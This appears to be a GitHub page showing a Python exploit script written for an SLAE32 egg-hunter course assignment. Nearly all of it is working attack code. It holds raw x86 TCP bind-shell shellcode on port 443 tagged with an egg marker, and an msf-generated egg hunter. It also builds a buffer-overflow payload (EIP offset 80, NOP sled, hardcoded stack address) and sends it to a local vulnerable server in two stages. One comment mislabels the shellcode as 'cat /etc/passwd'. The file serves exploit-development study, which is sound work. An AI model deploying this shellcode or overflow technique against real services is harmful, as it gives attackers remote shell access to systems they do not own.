-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathvulnerable-server-exploit.py
156 lines (117 loc) · 4.47 KB
/
vulnerable-server-exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
#!/usr/bin/python3
'''
Jean-Pierre LESUEUR (@DarkCoderSc)
jplesueur@phrozen.io
https://www.phrozen.io/
https://github.com/darkcodersc
License : MIT
---
SLAE32 Assignment 3 : Linux x86-32 Egg Hunter Research.
---
Description:
This is the full working (LOCAL) exploit code for egg-reallife.c program to demonstrate our
egg hunter is applied to real life situation.
'''
from socket import *
import sys
import time
import struct
#
# Log Defs
#
def success(message):
print("[\033[32m+\033[39m] " + message)
def fail(message):
print("[\033[31mx\033[39m] " + message)
def warn(message):
print("[\033[34m!\033[39m] " + message)
def info(message):
print("[\033[34m*\033[39m] " + message)
#
# Payload 1 : cat /etc/passwd.
#
# Prefixed by our egg token "egg!egg!".
shellcode = b""
shellcode += b"\x65\x67\x67\x21" # egg!
shellcode += b"\x65\x67\x67\x21" # egg!
# Shellcode payload (TCP Bindshell port 443)
shellcode += b"\x89\xe5\x31\xc0\x31\xdb\x31\xd2\x31\xf6\x31\xc9\xb1\x1e\x50\xe2"
shellcode += b"\xfd\x89\xec\xb3\x01\xc6\x44\x24\xf8\x01\xc6\x44\x24\xf4\x02\x83"
shellcode += b"\xec\x0c\x89\xe1\xb0\x66\xcd\x80\x89\xc6\x31\xc0\x80\xc3\x0d\xc6"
shellcode += b"\x44\x24\xfc\x04\x83\xec\x04\x89\x64\x24\xfc\xc6\x44\x24\xf8\x02"
shellcode += b"\xc6\x44\x24\xf4\x01\x89\x74\x24\xf0\x83\xec\x10\x89\xe1\xb0\x66"
shellcode += b"\xcd\x80\x31\xc0\x80\xeb\x0c\xb0\x01\xb4\xbb\x66\x89\x44\x24\xf2"
shellcode += b"\xc6\x44\x24\xf0\x02\x31\xc0\xb0\x10\x29\xc4\xc6\x44\x24\xfc\x10"
shellcode += b"\x89\x64\x24\xf8\x89\x74\x24\xf4\x83\xec\x0c\x89\xe1\x31\xc0\xb0"
shellcode += b"\x66\xcd\x80\x80\xc3\x02\x89\x74\x24\xf8\x83\xec\x08\x89\xe1\xb0"
shellcode += b"\x66\xcd\x80\xfe\xc3\x89\x74\x24\xf4\x83\xec\x0c\x89\xe1\xb0\x66"
shellcode += b"\xcd\x80\x89\xc3\x31\xc9\x31\xc0\xb0\x3f\xcd\x80\xfe\xc1\x80\xf9"
shellcode += b"\x02\x7e\xf3\x31\xc0\x31\xdb\x31\xc9\xc7\x44\x24\xf8\x2f\x2f\x73"
shellcode += b"\x68\xc7\x44\x24\xf4\x2f\x62\x69\x6e\x83\xec\x0c\x89\xe3\x83\xec"
shellcode += b"\x04\x89\xe2\x89\x5c\x24\xfc\x83\xec\x04\x89\xe1\xb0\x0b\xcd\x80"
#
# Payload 2 : Egg Hunter.
# Generated with msf-egghunter -f python -e egg! -v egg_hunter -p linux -a x86
#
egg_hunter = b""
egg_hunter += b"\xfc\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd"
egg_hunter += b"\x80\x3c\xf2\x74\xf1\xb8\x65\x67\x67\x21\x89"
egg_hunter += b"\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7"
#
# Networking Function
#
def SubmitPhasePayload(cmd, payload):
s = socket(AF_INET, SOCK_STREAM)
if (s.connect_ex((LHOST, LPORT)) == 0):
success(f"Successfully connected to {LHOST}:{LPORT}.");
# Send command n°1 (cache data in memory)
info(f"Send command = {cmd}");
s.send(cmd);
info("Wait 2 seconds...");
time.sleep(2);
info("Send payload stage.");
s.send(payload);
success("Payload successfully sent.")
s.close(); # Gracefully close connection.
return True
else:
fail(f"Could not connect to {LHOST}:{LPORT}");
return False
#
# Exploitation
#
LHOST = "127.0.0.1"
LPORT = 1403
info("Phase n°1: Sending shellcode to target server memory.")
if (SubmitPhasePayload(b"\x31", shellcode)):
success("Phase n°1 : Success.")
info("Phase n°2: Exploiting buffer overflow and sending egg hunter shellcode.")
#
# Create buffer overflow payload.
#
payload = b""
# (+): Locate EIP Offset.
# pattern_create.rb -l 250
#payload += "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0".encode('ascii')
#payload += "Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1A".encode('ascii')
#payload += "e2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3".encode('ascii')
#payload += "Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2A".encode('ascii')
# (+): Result = pattern_offset.rb -q "6Ac7"(offset=80)
eip_offset = 80
# (+): Test if we control EIP.
#payload += b"\x41" * eip_offset
#payload += b"\x42" * 4
# (+): Yes we did. 0x42424242 is in EIP.
# (+): Place and execute our egghunter shellcode.
nop_sled_size = (eip_offset - len(egg_hunter))
payload += b"\x90" * nop_sled_size # NOP Sled.
payload += egg_hunter # Our egghunter shellcode goes here.
payload += b"\x1c\xe3\xbf\xb6" # Stack address, ASLR must of course be disabled! Little Endian.
# (+): If correctly configured, shellcode should get triggered.
if (SubmitPhasePayload(b"\x32", payload)):
success("Phase n°2 : Success.");
info("Please wait few seconds until egghunter shellcode trigger the other one...");
else:
fail("Phase n°2 : Failed.")
else:
fail("Phase n°1 : Failed.")